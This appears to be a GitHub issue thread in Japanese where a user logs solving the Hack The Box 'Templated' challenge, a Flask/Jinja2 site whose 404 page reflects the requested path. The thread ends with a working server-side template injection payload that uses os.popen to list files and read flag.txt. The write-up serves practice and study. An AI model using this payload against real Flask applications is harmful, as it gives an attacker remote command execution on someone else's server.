roaris
commented
6 months ago ソースコードは無い
アクセスすると、これだけ表示される
Open roaris opened 6 months ago
roaris
commented
6 months ago ソースコードは無い
アクセスすると、これだけ表示される
roaris
commented
6 months ago Jinja2はFlaskのテンプレートエンジン SSTIをするにしても、ユーザ入力値が表示される箇所は無い
roaris
commented
6 months ago Local Storage, Session Storage, Indexed DB, Cookiesを確認したが何もない
roaris
commented
6 months ago 適当なパスを指定すると、404のページ中にパス名が含まれている
roaris
commented
6 months ago /{{2*2}}にアクセスすると、4と表示された
SSTI出来そうである
roaris
commented
6 months ago https://blog.hamayanhamayan.com/entry/2021/12/15/225142 に書かれている{{request.application.__globals__.__builtins__.__import__('os').popen('ls -lah').read()}}を試すと、上手くいった
flag.txtがあることが分かったので、{{request.application.__globals__.__builtins__.__import__('os').popen('cat flag.txt').read()}}でフラグが取れる
https://app.hackthebox.com/challenges/Templated